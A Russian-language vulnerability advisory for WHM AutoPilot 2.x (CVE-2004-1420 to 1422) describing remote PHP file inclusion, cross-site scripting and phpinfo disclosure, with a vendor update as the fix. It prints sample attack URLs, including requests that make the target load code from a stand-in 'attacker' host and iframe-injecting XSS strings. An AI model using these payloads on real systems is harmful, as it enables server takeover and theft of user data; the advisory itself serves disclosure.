Выполнение произвольных команд в WHM AutoPilot

Дата публикации:
29.12.2004
Всего просмотров:
1166
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-1420
CVE-2004-1421
CVE-2004-1422
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие системных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WHM AutoPilot 2.x
Уязвимые версии: WHM AutoPilot

Описание:
Обнаружено несколько уязвимостей в WHM AutoPilot. Удаленный атакующий может выполнить произвольные команды на системе, произвести XSS атаку, получит информацию о системе.

Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Примеры:

http://[target]/path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php
http://[target]/path/inc/step _one_tables.php?server_inc=http://attacker/js_functions.php
http://[target]/path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

Удаленный атакующий может произвести XSS атаку и получить доступ к важным данным пользователей. Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Примеры:

http://[target]/path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://[target]/path/admin/them es/blue/header.php?http_images='%3E%3Ciframe%3E

В конфигурации по умолчанию на системе после установки WHM AutoPilot присутствует файл phpinfo.php. Удаленный атакующий может получить информацию о системе.

URL производителя: www.whmautopilot.com/index.php

Решение: Установите обновление
http://www.whmautopilot.com/index.php

Ссылки: Vulnerabilities In WHM Autopilot

или введите имя

CAPTCHA